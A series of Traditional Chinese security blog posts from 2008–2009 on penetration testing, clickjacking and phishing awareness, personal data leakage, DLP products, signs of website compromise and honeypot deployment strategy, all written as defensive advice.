最大的差別，之前有提到，就是「時間」的差異，因為真實入侵並沒有時間壓力，很多時候都是等待一個契機，一個契機就可以拿下主機或甚至是一整個 Site；另外一個就是網站被盯上後，盯上的人技術層面雖然有高有低，但，每個都是用自己最厲害的拿手絕技來檢視你的系統、網路架構，你的網站夠大、夠吸引人，哪來者千奇百怪，你如何有效應付呢？有時最簡單也是最有效的攻擊方式，有時只是一個意念與技術無關的攻擊巧門，可能就瓦解你的整個防線了。

滲透測試 vs 弱點掃描
弱點刺探、掃描的步驟，只是滲透測試過程中的一個環節，滲透測試最重要的也就是要有能力檢測漏洞是否真正存在，可以如何被利用，能利用到哪個層級。甚至，更好的滲透測試應該要能找到弱點掃描無法發現的問題。所以滲透測試絕不等於弱點掃描加漏洞驗證而已，它可是需要絕佳的創意與發想的，換句話說，得有些邪惡的意念...XD。

個資法的不確定因素
把滲透測試開放全民公測吧！主要會有這想法也是因為個資法的「即將」通過。對於個資法的通過，需多人看到巨大的資安商機，但...我不認為有資安商機會有多大，天底下沒有一個產品或技術可以一夕之間解決所有問題，我反而看到了巨大地下經濟，有些事不宜說太明。如果要一夕之間把資安做好，還是要一夕之間發現主要問題，來針對問題解決呢？你得評估哪個比較容易。

前面已經提到，滲透測試再怎麼模擬，也無法等同真實入侵，所以提出「滲透測試之全民公測」觀念，開放網站、系統給國內白帽駭客公測吧！只要訂定一套規則說明，依循此規則進行即可，只是目前沒有相關遊戲規則可以參考，要當前瞻者本來就不容易的；依據發現問題層級達，若達特定規模或層級，可提供檢舉獎金或通報獎金吧。另外一個層面的意義也是「買回你不知道的漏洞或問題吧！」，否則，衍生所導致的問題可能讓你付出更多，多到可能稱之為巨額。

滲透測試之全民公測
1.風險高嗎？
也許你會覺得這樣風險很高，可能不小心網站、系統被玩掛了，但從另外一個角度想，網站、系統如此脆弱，是否也該思考予以補強呢？「全民公測」只是把之前檯面下的風險搬到檯面上的。
2.攻防技術的對等
要思考內部人員是否能有資安技術的提升，如果攻防差距過大，「全民公測」相信絕對無法解決你的問題。因為，即使知道問題，但可能也不了解問題本身，當然更無解決能力。
3.自信心
這是對自我系統、網路、基礎架構、資安防禦工事的掌控程度的自信心呈現，如果掌控度高、調派力夠、反應力快，你也知道這樣的資安團隊只要有技術能力，往往能「主動」發現問題，也能接受各種資安威脅的新挑戰，「全民公測」反而是助力，可以參考這篇文章。這會是你的目標嗎？
4.前瞻性
有個觀念還是要提一下，「資安不是流行產業」，做資安千萬不能一窩蜂，舉個簡單的例子，當每個人都在蓋鐵路時，要嘛，就是你已經蓋了，不然就忍一下，做前瞻規劃然後直接蓋磁浮列車或高速鐵路或捷運，這時你的選擇是很多的，評估手上資源妥善運用新的技術，如果老是用舊觀念舊思維做資安，包袱會是很重的。「前瞻者」是會比較辛苦的，畢竟前方篳路藍縷，要當第一個走過的人，有很多事得思考與執行才能成功。
5.個資法與地下經濟的變數
你思考過個資法會對地下經濟產生哪些變化呢？地下經濟鏈會有何改變呢？現階段以靜制動可不是上策的，尤其是大目標的話。

破解點閱綁架手法

2009-02-17T21:42:00.008+08:00

看完「模擬實戰點閱綁架手法」一文，是否有心得感想呢？沒...挖勒！！

這裡寫些我的心得囉。既然整個「點閱綁架(Clickjacking)」的關鍵在"點選(Click)"動作，如果要靠防護設備或工具，如 NoScript 或 WRS ...等，提升瀏覽器安全性，但是都有萬一檔不住的問題，靠別人實在不可靠的。

所以在這裡提供靠自己的解決方案：
1.善用「複製連結」方式
　別忘了滑鼠的右鍵(對慣用右手的人)，如後面數個瀏覽器的附圖可參考。然後貼到瀏覽器的網址列上，這樣還可以檢查及確定要連往的網站。
2.還有「標記(Mark)->複製(Copy)->貼上(Paste)」一式
與前項有異曲同工之妙。

也許有人說這樣瀏覽網站會很累人。的確，我不否認。我也絕對不會這樣幹的。
方便與安全總是在天秤的兩端，所以這也取決你身處風險，決定使否該使出絕招的。當發現身處危險環境時，該如何自處？該有何因應呢？至少，在不可信任的網頁或環境(IM or E-Mail)中，該用這招的。

另外，值得一提的是：對付釣魚手法的觀念與技巧
1.若「我的最愛」中有的連結網址，決不使用其他超連結。
如果「我的最愛」中的連結網址有釣魚網站，這我就不知該說啥了...XD。常見的郵件或網站中連結、IM 送來的連結...等，都是常見會被利用的釣魚網站連結，所以都要特別注意。
2.若是連結不熟悉的網站，一定要選用防護強化的瀏覽環境
你一定要有安全的瀏覽環境，例如 Firefox 3 + NoScript 是個不錯的選擇，當然還有其他強化瀏覽安全的軟體或元件，這是你上網的一個課題，一定得去了解的，透過了解的過程也能熟悉威脅所在。
3.輸入帳密前要先想一想
無論何時，要在網站上輸入帳密時，都要想想是否被騙了？是否連上釣魚網站？很多地方在騙帳密資料的，可以參考這裡，還有這裡。
4.騙術終究是騙術
畢竟騙術中一定有它的梗、釣魚得有它的餌，前面一定都會有很多鋪陳，看多了自然能識破，所以要強化個人敏感度。如果上當了，第一線交由防護設備查覺，對於防禦工事的任何警訊都要加以注意的。第二線也是最後的個人警覺性了，看是否能在最後踩住剎車或進行應變處理。
5.事後補救措施
總是有上當的時候，我也曾經上當的，常常都是因為心急、貪快，現在就知道「戒急用忍」，你呢？你的原因是啥？你一定得去分析、了解，才能知道弱點在哪。所以，查覺上當之後，當然要有因應措施，例如進行密碼變更、系統檢查...等。

現在有很多「虛擬機器」如 VMWare、VirtualPC...等，或許在虛擬環境中上網或進行一般操作，不失為一選擇，即使出問題也可以即時復原，當然在虛擬環境中也應該與重要資料做切割，必要時進行帳密修正，達到一定的安全性。

模擬實戰點閱綁架手法(Challenge to Clickjacking)

2009-02-02T10:25:00.006+08:00

啥是點閱綁架(Clickjacking)呢？
用講的太慢啦...直接來親身體驗最快。
這有個實作的體驗網站，可以點選這裡。畫面如下：

實戰點閱綁架，這網頁並無惡意攻擊，只是導向到另外一個 Blog 網頁，請放心。主要在於讓大家了解何謂「點閱綁架(Clickjacking)」，將滑鼠移到超連結處，檢查左下角落的連結網址，發現哪有不一樣嗎？明明是應該要連結到 google 網站的不是嗎？你連到哪了呢？目前已知可以成功的瀏覽器：
1.Firefox 3.0.5
2.Chrome 1.0.154.43
3.Safari 3.2.1 (for windows)
4.IE 7.0.6001

手法剖析：
1.如果瀏覽器有問題(上述瀏覽器)，該連結將不會連結至 google 網站，而是其他網站。
2.如果正常連結至 google 網站，表示不受影響。
3.有心人士可以利用此手法將惡意連結夾帶其中，偽裝成銀行或一般正常連結(URL)。

之前還有一篇文「模擬實戰釣魚網站」，都是希望大家能有些防禦觀念，了解攻擊、詐騙手法，自然就會多一分小心的。

本文同步張貼於「阿碼外傳」。

雅虎搜尋引擎遭掛馬利用！注意！

2009-01-14T00:07:00.009+08:00

平常用 Yahoo 搜尋引擎的人要特別注意了。搜尋結果會出現帶有 XSS 攻擊的連結，若是連結目標網站存在 XSS 漏洞，會導致瀏覽者的瀏覽器軟體遭受攻擊，系統有被植入惡意程式的風險。這是網頁掛馬手法的翻新利用。該惡意連結與先前<駭客集團於新年假期展開罕見之大規模SQL Injection攻擊>一文的惡意連結相同。

詳細分析其中一個搜尋連結：

直接搜尋"inurl:daxia123"的連結：

可以看到很多搜尋連結夾帶攻擊碼，如果點選連結，配合 XSS 漏洞，會導致瀏覽者遭受攻擊。

直接搜尋"inurl:jxmmtv"的連結：

手法跟 daxia123 幾乎是一樣的，當然，因為是一夥的。

研判可能原因有：
1.大量掛馬的網頁，造成雅虎搜尋引擎抓到網頁連結時，就是已經被掛馬的連結，導致搜尋連結帶有惡意網址。
2.有人大量餵給雅虎搜尋引擎掛馬連結，導致搜尋結果的連結，帶有惡意網址。

先前 google 也有遭利用，被用來進行掛馬攻擊，可以參考鳥毅-<Googlt Bot會找漏洞>一文。

「個人資料」的某些情境探討 (About Scenario of Personal Data Leakage)

2009-01-12T21:23:00.004+08:00

個人資料外洩的問題，大家都知道很嚴重，但都搞不清楚怎回事。多數人都認為是別人的問題，很多時候都是自己把個資送出去的。
保護個人資料，「你」也有責任，且「大家」的責任更重。
可以參考「聯合徵信中心」網站的「資訊新時代個人資料保護須知」一文。
微軟網站也有一些建議：進階技巧︰保護個人資料。
我這裡思考了幾個情境，希望能大家能注意，這些情境不是自己做好資安防護就能解決的，畢竟很多狀況是你無法完全掌握的。

情境一：會員或商務網站的個資
很多網站都會有會員的資料庫，當然，你是會員，網站資料庫就有你的個人資料。當你在網站登錄會員資料的時候，一定會填寫的一些資訊，就是聯絡的電子郵件信箱，還有這個會員網站需要的帳號密碼，這兩個資料很微妙，因為其他資料你有可能填寫假的。你有仔細想想這其中的關聯嗎？如果會員網站的密碼，就是聯絡的電子郵件信箱密碼，這可是嚴重的問題啊。換句話說你已經把「聯絡的電子郵件信箱」拱手公諸於外了。如果又是萬用密碼...這可不是好玩的。
這個情境，你得保證下列情況，你才能確保你的個人資料安全：
1.網站管理者不會查閱資料庫中你的資訊，窺探你的隱私。
2.網站不會被入侵，網站資料庫資料不會被竊取。
3.內部不會有人販賣個人資料，也就是內賊通外鬼。
4.網站程式設計沒有問題，不會被搜尋引擎取得或他人未經允許的查閱。
5.密碼管理問題，你得做好密碼分級分層管理的。如果你還是一個密碼打通關的，千萬小心啦。
會不會突然間覺得好像很多個人資料流浪在外呢？會員資料，有時就等同客戶資料，只是客戶資料有可能是公司資料的，這又是另外一個層級-商業機密或商業間諜。

情境二：IM 的 Web2.0
這情況更絕了，是別人在幫你維護個人資料。有些人在 IM 經常變更暱稱，為了能夠識別他人，所以很多人會維護 IM 上的聯絡人清單，姓名、地址、電話...搞不好連照片都有。甚至在把很多個人通訊錄都給它放在網路上了，會這樣做的多半都是有業務性質工作，這個族群的人通常不太有資安觀念的。這只有一個問題，萬一這人的 IM 帳密外洩了呢？
這個情境，你得保證下列情況，你才能確保你的個人資料安全：
1.他人善盡保護他的 IM 帳密嗎？【如情境一，也許已經把密碼公開了哩】
2.會不會 IM 帳密外洩了還不自知呢？【你！出賣朋友嗎？】、【網路上交朋友要小心】、【騙取MSN帳密的釣魚網站...真多!!】這些文章你非注意不可，別人或你都有可能外洩帳密。
3.別人是否把隱私資料往外送呢？例如精彩的圖片或機敏檔案...
4.別人的系統中會不會有惡意程式呢？
這個情境得先看是這個人的資料是否有價值，就像狗仔隊一樣，如果你被盯上了，你得小心囉，畢竟掌握權不完全在你的手上的。如果你是關鍵人物或知名人物，你得小心的劃出一道防火牆了。我發覺這情況似乎越來越嚴重了。看到這裡，「大家」是不是先把 IM 上的密碼改成一個比較特別的密碼！

情境三：搜尋引擎的利用
只要開啟瀏覽器，連上搜尋引擎網站，利用搜尋引擎尋找跟自己有關的資料，例如名字、代號、E-Mail...等，看看有沒有敏感資料在搜尋引擎中。很簡單的動作，也許就可能知道某網站正在洩漏你的個人資料，可以採取一些行動，甚至法律動作進行自保。這應該算是比較常識的，也頗常上新聞媒體的。有心人事可以用，你也可以利用的。
這個情境，你可以檢測個資是否外洩，確保你的個人資料安全：
1.是否有網站未盡保管之責。
2.檢測自己是否在網路上的活動軌跡，是否有過多外洩情況。
如果發現 google 有敏感資料，可以參考【重灌狂人】網站文章進行移除工作，但問題根源還是存在的。

情境四：個人化網站的個資外洩
Web 2.0時代，你就是主角，但，你很可能疏忽在網路上不小心公開過多個人資訊。目前很多部落個可以分享個人資訊，也有 IM 可以公開個人資訊、照片、檔案...等，務必謹慎使用。有些人是收集資料後做行銷用的。
這個情境，你得確保下列，才能確保你的個人資料安全：
1.可以利用一般權限瀏覽個人資訊，最簡單就是用另外一個瀏覽器採一般使用者權限瀏覽，檢查是否開放過多個人資訊。
2.也可請友人在網路上檢視個人訊息是否正確。
3.當然啦！你也要確保帳密不會被騙走的；網站系統不會被破解。
4.是否自己把機敏資料或隱私圖片在網路上呢？誰能確保它的安全性。

以上最佳解決方案：
1.網路的第二個身分，記得習慣性留假資料。當然啦，某些地方是不行的，例如網路銀行、報稅資料的...這些地方只能選擇相信它。
2.不要留下機敏資料或隱私圖片在網路上，連主機上都要仔細審慎評估。
3.密碼管理技巧。最好除了帳密之外，應該要有其他配合身分驗證的機制，但目前很多都只有基本的帳密驗證，這是很脆弱的。

外章：資料遺失防護(Data Leakage Prevention, DLP)

2008-12-07T09:42:00.004+08:00

資料遺失防護(Data Leakage Prevention, DLP)這兩年似乎成為資安的熱門產品。滿街資安新聞的個資外洩、交易資料外洩、機敏資料外洩...似乎 DLP 產品成了救世主，想當年入侵偵測系統 (IDS) 也曾經大喊我是救世主的哩！

坦白說，DLP 產品並不是太新的產品，以前就有類似的產品，只是這兩年比較有共識的名稱：資料遺失防護 (DLP)。

這類產品，在我看來有幾個矛盾：
1.防人為嗎？不小心把重要文件帶出，導致資料外洩嗎？應該是沒把資安當一回事吧！如果沒資安觀念，再多的資安技術都是白費。
2.防內賊嗎？如果真的要偷，真的偷不走嗎？大家應該看過電影吧！相機、攝影機不就是 DLP 的天敵哩，也許你會說相機、攝影機禁用！問題是真的管得住嗎？內賊耶！最終它很可能化身成為一張 SD 卡哩。除了相機、攝影機...還有一個印表機哩...XD
3.防外賊嗎？會不會安裝 DLP 軟體反而出現漏洞呢？或者資料不是以數位文件方式存在，而是在資料庫中，DLP 有救嗎？外賊才不會用「標準」的方式存取資料哩。
4.為何自2000年到2008年作了這多資安防護技術的管理與投資後，卻還要去買 DLP 產品呢？這問題你得深思。

那真的沒有用嗎？我想說的是「單一的資安技術不是萬能的」，之前提的一篇文「就單一資安科技而言，無法達成"絕對"的資訊安全」，資安的防禦佈署是需要全面思考的，而不是只有評估單一產品。但一般企業或單位卻都只有評估單一產品，評估卻選最好的而非選最適合自己的，甚至，還不是自己去做評估的。當然啦，這涉及採購及評估流程，如果這第一步踏出去都有問題，資安佈署與架構就不用談，更何況後續維運管理了。

以資安設備而言，防火牆、入侵偵測防護、防毒軟體、還是內容管理...等，一堆的資安設備不就是要維護資訊的 CIA 嗎？還有 ISMS 資訊管理制度哩？你覺得這些都過去了嗎？不足以面對現今威脅嗎？還是你喜新厭舊嗎？資安可不是這樣搞得哩！每樣資安產品或服務都有它一定的效果，只是有大有小，跟價格也非成正比，重要的是會依據不同的 IT 環境佈署，有完全不同的效果；你不關心既有的防護，卻一直寄望新的資安產品解決問題，這是非常弔詭的，你得深思這問題。

題外話：我認為資安最大的挑戰：
1.滿街教人入侵的技術
就像是滿街黑槍一樣，有人隨手一抓就開槍了，這樣治安當然會不好。但壞人少不等於沒有人會做壞事。這個原因並不是最大挑戰，但很多人認為它是。
2.缺乏防禦資安的觀念交流
每年到處都有駭客年會，交流各種黑技術。但防禦呢？閉門造車嗎？也沒有交流平台的，這樣做防禦都是在土法煉鋼的，效果不彰的；或許只能靠自已人脈，多認識一些圈子內的。
3.做資安都在等出事嗎
有人說資安問題像企業其他行政、支援問題，可以等壞了在修，所以資安歸類在行政、後勤部門，晚一步做也沒關係。也有人資安比較像是財務、營運、市場部門，必須做些預警與風險控管的事，要早一步做的。兩種說法都可以，全看對 IT 的定位，其實也沒人說網站不能被入侵唄。你得列出你的底線，加以防範或偵測，還要計畫當出問題時要如何因應，問題是，怎定位、誰定位...
4.當 IT 環境成長後，不了解自我環境或環境障礙
整個 IT 環境複雜加上陳年歷史，已經無法掌握甚至是完全失控，這樣的環境是不可能有作為的。還有很多也是管理面的問題，上面想做下面卻不配合，或下面想做上面卻不支持，這樣的環境會很容易讓人失去做資安的重要本質，如熱誠、主動、盡責、積極...等。我認為這點才是最大挑戰，畢竟最大的敵人是自己的，要戰勝自己得先了解自己。

騙取MSN帳密的釣魚網站...真多!!

2008-11-24T20:40:00.002+08:00

之前的一篇文「你！出賣朋友嗎？」，使用 IM 軟體千萬要注意。
突然收到好友送來的訊息，千萬要注意，不要急著點選連結，可能是有問題的，參考下圖：

最近蒐集的 IM 詐騙網站：
1."msnpic9254.hopto.org"的釣魚網站。

2.這個釣魚網站設計就很精美了。

至於騙你的MSN能做啥呢？看看下面的另外一個連結：

廣告放送是很好的「合法」管道，如下圖：

當然，操控者還能送其它的訊息給你。
如果送來的是惡意連結或惡意檔案，你又能分辨嗎？
千萬不要隨意在不明網站，輸入你的帳號密碼，網路銀行帳號密碼或許你有警覺，IM 帳號密碼呢？警覺性呢？會不會出賣朋友還不自知呢？

網站多久沒健檢，是不是該關心一下了 (Take Care Your Website)

2008-11-11T20:18:00.002+08:00

你有多久沒有好好看看你的網站了，沒出事就不關心了嗎？那...不出事才怪的勒！資安...心態最重要。
平常應該要多關心網站運作狀況，是否有任何入侵的蛛絲馬跡，而這些徵兆都不能輕忽之；否則，網站問題將會層出不窮，小則網頁竄改、資料庫被操弄，或植入惡意連結；大則資料庫個資外洩，被詐騙集團利用，甚至機敏資料外洩。這些問題，平常多少一定會有些徵兆的，注意這些徵兆將會是避免事態持續擴大的重要關鍵。

有很多入侵行為，是沒有任何網站內容的竄改的，也就是說，入侵這台主機只是當跳板，但是，可能其他相同網段的網站卻經常出問題，你卻始終找不到真正病因。就像很多疾病，帶原者本身並不發病的，但是接觸的人可就慘了，很多攻擊模式有異曲同工之妙。

如果有下列徵兆中的一個，幾乎代表網站被入侵了，多個那就肯定被入侵：
* 網站目錄下是否有多的莫名檔案
* 網站主機上是否有多的莫名帳號
* 資料庫中是否有奇怪字串或帳號
* Mass SQL Injection 攻擊遺跡
* 網站主機之防毒軟體是否有異常警訊
* 網頁目錄是否有網頁木馬後門程式
* 系統的後門或木馬程式(惡意程式)

1.網站目錄下是否有多的莫名檔案
這跟網站的版本控制 (Release Management) 有很大的關係，因為，這部份做的好，可以很輕易從網站目錄中，找出被竄改或植入的檔案，也就知道網站被入侵了。不管是比對檔案差異、大小或日期...等，都可以查覺網頁檔案被動過手腳的，這點是最容易發現網站被入侵的，也是最精確的方式之一。無奈，大多數網站的網頁檔案，多是雜亂無章、且龐大，有的還有資料庫檔案在其中...XD，根本沒人知道哪些網頁檔案是屬於正常的。所以，你需要一個乾淨無虞的原始網頁檔案，而不是備份的，因為，備份都是線上的，往往都已經被動過手腳了，備份回來正中入侵者下懷，導致再次的誤事哩。你有乾淨無虞的網頁原始程式嗎？100% 確定沒被動過手腳的喔。
這點我還要在強調一次，你有乾淨無虞的網頁原始程式嗎？並配合正確版本控制管理 (Release Management)，當網站出現問題時，它將會是非常重要的。

2.網站主機上是否有多的莫名帳號
如果主機被新增異常帳號，這也是被入侵很明顯的一個徵兆，也可以檢視可疑帳號的登入記錄，判定是否為入侵的帳號；如果網站主機有開遠端管理服務，不管是 3389 或 VNC...等，一旦被入侵，新增帳號就會是很常見的一個行為，對入侵者來說是多一條路可以進入系統。資料庫的部分是否有異常帳號，也是重要徵兆之一，這也表示資料庫中有重要資訊是有心人士想要的，慎之。

3.資料庫是否有奇怪字串
「奇怪字串」...我知道它很模糊、籠統，因為，要植入的字串千奇百怪；如果可以操弄資料庫，那要做啥入侵動作，這可沒有一定的標準程序哩，甚至有的只是改「商品售價」，這是奇怪字串的嗎？不過已經好幾年沒人這樣玩了；這攸關對網站的敏感度，所以，平常需要對被入侵網站的結果呈現，多加觀察，畢竟實際案例是非常好的案例教材。目前最常見的，是在資料庫中植入惡意連結或入侵字眼，入侵字眼比較容易發覺，網站上多會有明顯字眼可察覺；惡意連結部分較難查覺，可以參考這篇新聞。

4.Mass SQL Injection 攻擊
我知道看 log files 很辛苦，我也深受其害...XP，所以報個好康的：
SQLInjectionFinder.exe : Tool to help determine .asp pages targeted by recent SQL Injection attacks.
它會幫你找 Mass SQL Injection 攻擊字串的事件，可以幫你省很多事的，希望對大家有幫助。針對被攻擊的網頁程式碼需要注意是否有漏洞，否則，資料庫可能被操弄了。有很多網站被攻擊還不自知的，植入的惡意網域可能都已經不生效了。

5.網站主機之防毒軟體是否有異常警訊
防毒軟體的歷史病毒記錄，是否有發現惡意程式的記錄，這也是被入侵的重要徵兆之一。不是看防毒軟體把惡意程式清除了，然後就裝沒事，要思考惡意程是打哪來，入侵管道才是要關心的重點。很多系統管理者都輕忽這點，問題在防毒軟體沒有 100% 的，更何況入侵者可能知道你安裝了哪家的防毒軟體，所以有一隻鐵定會有第二隻的，也許哪天防毒軟體更新病毒碼了，就「剛好」發現一隻...XD，結果你也「剛好」錯過...挖哩勒。

6.定期使用線上掃描工具檢查網頁目錄是否有網馬後門
Free Online Virus Scan
Free Online Spyware Scan
使用線上掃毒檢查網頁目錄下，是否有惡意程式存在，如果你無法確認網頁目錄是否有可疑程式，這不失為亂槍打鳥的一種方式，但使用上務必小心，不要輕易把惡意程式給刪除了，它可是重要線索的。啥...沒看過網馬後門嗎？哇咧！這好像遊客搞不清楚啥是搶匪一樣，連搶匪手上的刀也完全不識，被搶了還以為是借錢的...XD。

有沒發現這傢伙比系統的檔案總管好用太多啦...

7.系統是否被植入未知的惡意程式
這點對大多數的系統管理者來說是困難的。前面提到的線上掃毒也是一種方式之一，但也可能破壞犯罪現場，務必慎用。最好，還是需要有專人協助的。

以上只是一些常見的徵兆，需要特別加以注意的；上面也說這麼多了，對很多單位還是沒用，有時不知道比知道好，知道了又能如何，因為，沒人在做事件應變處理 (IR) 的，更不可能組成「資安事件緊急應變小組」來協助處理後續事宜。如果有心想做，可以參考「企業事件應變管理」一文，管理階層務必加以重視。資安很多問題是要改變管理的思考角度與方式，如果老是重複相同的事情，無力感將衝擊著你，有些事情是必須讓管理者知情，找出問題並尋求解決之道，「深思網站淪陷背後的意義」這篇你或管理者更需要閱讀、深思的。正視它，有些事會讓你成長的，如果只是閃躲，有些事將會變得很無情。

本文同步張貼於「阿碼外傳」

資安，攻擊容易還是防守容易

2008-11-04T20:31:00.002+08:00

這問題應該很多人有討論，但，似乎都沒有很明確的結論。
我認為這問題很重要，企業或單位內部資訊人員每年都應該辦一場辯論賽，可以從中激發很多內部資訊問題，要提出問題才能有解決的機會。如果「解決」資安問題，都是靠可能是、應該是「某個」問題，所以去解決它，解決問題時全憑意測；認為解決後，又無法衡量問題是否已經被完全解決，或被部分解決，或者跟本沒有解決的，所以期待資安問題的再次發生，這些都是很衝突的想法。希望這裡過一些問題探討，能給大家一些省思。

攻擊容易的論點或說法：
1.漏洞太多，問題防不勝防
2.壞人太多，技術能力高超
3.該買的也買了、該做的也做了，卻一直「解決」不了問題
4.需要有錢做防禦工事
5.人力有限
6.管理階層並不重視或不知道資安所衍生的問題

防守容易的論點或說法：
1.有正確的資安觀念與心態
2.有「良好」的資安技術能力
3.團隊合作
4.管理觀念、資安防護架構完整
5.主動做資安，重點強化防禦

我的重點是，你必須思考目前您自身資安的現況，去了解為何會「攻擊容易」及「防守容易」的原因，而其中「攻擊容易」的部分就是自身資安需要加以改善的重點，這樣也可以「發掘」一些資安問題所在；「防守容易」的原因，就是目前自身資安工作上的優勢，是需要保持甚至再加強的，甚至給予一些獎勵措施的。

我的想法：
1.資安攻守是一場不公平的戰爭
戰場由你決定、地形地物也是由你安排，如果敵人可以「如入無人之境」、「來無影去無蹤」，這應該是有大問題的。如果你的優勢盡失，那就自然會處於不利局面，這是必定的；「主動」做資安才是正確觀點，再強調一次「要挖掘資安問題，而非解決資安問題」，因為都是等出事了，才會有要「解決」的方案；挖掘資安問題，才能避免資安問題的發生。
2.有錢不一定能做好資安工作
買入越多防護產品或系統，相對的會需要更多人去維護管理，就成本而言很容易把資安預算吃光光。但大多數的企業或單位，寧願買十台車，卻仍只保留一個駕駛的編制。況且有錢往往都會亂花，卻不見任何成效，這也是 IT 部門被詬病的最大要因；最後，疊層架屋的防禦架構，很容易把整體資安防禦壓垮哩。沒錢，絕對有沒錢的做法，只是要看你的使用者或管理者能不能接受它。
3.有人才是關鍵所在
把經費放在培養人才上，資安的預算將會獲得逐年減少，資安問題才能得到控制。而且，當你培養出真正資安人才後，你會發現「能用」的資安產品或軟體，是少之又少，能到「堪用」就阿彌陀佛啦，很多地方還是需要靠人與制度、管理來補足的。
4.需要建立完善的體制
目前 ISMS 是很常使用的一套機制，但，它絕對不夠，況且很多都把它當門面，大玩表面功夫、兩套制度。需要靠體制建立完整的資安團隊，這一直是管理者最大要務不是嗎？
5.管理面的充分支持
這我就不用說了吧！沒有上級的支援，只能寄望藍波 (Rambo) 在現。不過，不少單位真的是靠藍波在撐的。希望這個人不會有單點失效的問題。
6.防守比較容易，且資安會越來越好做
在漏洞越來越珍貴的年代，重大的系統漏洞或 0-Day 漏洞會更不容易找，找到了價值不斐，這類漏洞不會輕易用在一般攻擊上，所以未必會用在你我身上。資安防護要有重點與技巧，尤其是社交工程術，才是未來重點中的重點。

最後，僅以本文給予資安人員一些鼓舞，資安真的沒這難做。

誘捕系統 (Honey Pots)探討、策略及管理

2008-11-03T01:32:00.002+08:00

誘捕系統 (Honey Pots)，大多數會使用的，多半為社群或研究(Research)單位，對攻擊、入侵...等資安事件做研究之用，並從中找到資安防護之道，推出資安防護產品或強化防護產品不足，尤其是防毒產業，都一定會建置誘捕系統來擷取網路上的惡意程式樣本來製作病毒碼。對於誘捕系統的使用，多數企業或政府單位並未建置、佈署，因為，它的運用是更高一個層次了，但我建議金融業、網路交易平台業、線上遊戲業，應該都需要有「自己一套」的誘捕系統，在所有資安防護商都說無法保證 100% 安全的時代，誘捕系統是「查覺」資安問題頗佳的方式之一，無奈，大多數的企業或單位想是全是要「被動解決」資安問題，並不會想「主動發掘」資安問題，這裡面是有點吊詭及迷思的，我也不知道是對自身防護有自信還是＃＄％＠＊。

如果你無法確定第一層防護的安全性，通常第一層是指外部 (Public) 網路可以接觸到的 IP 或系統，多半是網際網路服務，如網站...等，那你該加強第二層的防禦作業，通常是網站主機上的防毒軟體，但光靠防毒軟體是不夠的。這是可以考慮誘捕系統或特別的監控系統，來查覺入侵事件的發生，有時第二層的防禦會更簡單做且有效。其實，很多系統管理者都有查覺入侵事件，只是沒呈現出來而已，可以參考「低調、詭譎與資安」一文，有些地方是該低調處理，但有些地方是千萬不能低調處理的。

一般常見的誘捕系統，可以參考網站：
The Honeynet Project
裡面有數個誘捕系統，維基說明中的網頁也有，不過有些重複的；這裡還有更多哩。其實誘捕系統本身也是一門大學問的。但...要實作誘捕系統並不一定要做的很複雜，有時簡單的動作也可以抓到獵物，畢竟，人家可是在你的地盤上撒野哩，無論如何，整體規劃才是最重要的。

了解誘捕系統的一些文章：
1.SANS - What is a Honeypot?
2.Shadowserver Foundation - What is a Honeypot?

獵捕原則：
1.你的獵物是甚麼？
這點很重要，必須明確知道你想抓的是啥，而且野心一開始不能太大。確定你的森林有這獵物的嗎？或可能有的嗎？
2.獵人必須清楚獵物的習性
獵物要的是啥？你有獵物要的目標嗎？獵物的活動、習慣與行為都是研究的目標，獵物必有的習性就會是誘捕的重點。
3.你是獵人嗎？
如何架設陷阱？如何掌控陷阱？如何有效管理所有陷阱？千萬別忘了，這片森林是你的，別讓人在你的地盤上撒野。

這裡有幾個誘捕系統有呈現結果的網站：
mwcollect.org : Malware Collection Made Easy
http://www.mwcollect.org/
#主要是抓惡意程式 (Malware)，還有攻擊來源 IP。
honeytrap.mwcollect.org : Trap Attacks In Your Network
http://honeytrap.mwcollect.org/
#主要是抓惡意攻擊碼，例如蠕蟲的網路攻擊封包。
Shadowserver Foundation : gathers intelligence on the darker side of the internet
http://www.shadowserver.org/
#這網站是頗具知名度的，主要就是抓 Botnets，當然還有其他的，如 DDoS、Malware、Virus...等。

所以，身為獵人第一要務是你的獵物是啥，很多人在佈署時最大的問題；另外一個問題就是想抓到所有的獵物。如果你的企業中是動物園，你用一個捕獸器就想抓到所有小動物嗎？你的問題不在誘捕系統，是該要全面檢討防禦系統了。
之前的一篇文「企業入侵偵測管理」，有提到入侵偵測系統應該要整合誘捕系統的，我深深的認為入侵偵測系統本身就是誘捕系統的一種，不是嗎？入侵偵測是要發掘入侵行為不是，只是誘餌是真實系統，會不會突然覺得導入入侵偵測系統是玩很大的...XD；沒錯，入侵偵測的使用是很驚險的，況且很多企業或單位買了沒都沒用、用了也沒看、看了也不懂、懂了又不會應變處理...XD，入侵偵測真的是用來解決問題的嗎？

誘捕系統的佈署策略：
1.在奇不在正
越是意想不到的，越容易抓到獵物，總之就是比創意；現行的產品或軟體也許獵物都很熟悉啦，當然，要躲的機會就高嚕。陷阱也是「天然的最好」，還要配合地形地物喔！才能達到出奇不意。
2.在謀不在勇
要有計劃的策略與計畫，且要變化，如果一成不變，會失去原有意義。就算是陷阱也會經常變更地點的，我們當然可以多些餌，有的真有的假，經常變換真真假假，達到欺敵的手法。
3.在精不在多
準確率很重要，低誤報 (False Positive) 是一定要的，因為這是誘捕系統最主要的特性，否則很容易把資安事件應變處理 (IR) 人員搞掛；漏報 (False Negatives) 則越低越好，這部分是需要設法降低漏報情況，可以邊做邊修 (Tuning) 的方式，降低到可以接受的程度。
4.貴不一定好用
便宜也會有好貨...XD，不管黑貓白貓，會抓老鼠的就是好貓。有時免費的創意功能，效果可能是驚為天人的。
5.外來威脅或入侵者思路與絲路
你必須知道外部重大威脅是哪些？入侵者在想甚麼？會有哪些動作、行為及反應？抓住「關鍵下一步」，就可以成功誘捕。
6.陷阱的考驗
進行滲透測試時，將會是最佳時機。如果你還在架一台主機或網站系統，看誰攻進來就判定誰的滲透能力佳，這是很奇妙的想法；有做滲透測試的人都知道，打得進去多半靠的是直覺與運氣，因為時間有限，除非目標太容易打；對有心人來說，時間問題不大，他等的可是機會哩；兩者思考邏輯不同的，對於誘捕系統來說都是測試的好時機，如果佈署的奇、謀、精，是能看出哪些人馬有比較高超的技術能力，不過，通常能這樣做誘捕系統的，自己也有一身好本領，畢竟資安是實力展現的，唬是沒用的。
7.獵物正在看你安置陷阱
最後一點，安置陷阱的時機。最好配合網路架構異動及系統異動進行。這也是很容易被忽視的一點，否則可能誘捕都在白做工。清理現場當然也是一種方式，但重點是不被查覺為關鍵，除了一點例外，「被查覺」也是誘捕計畫之一。

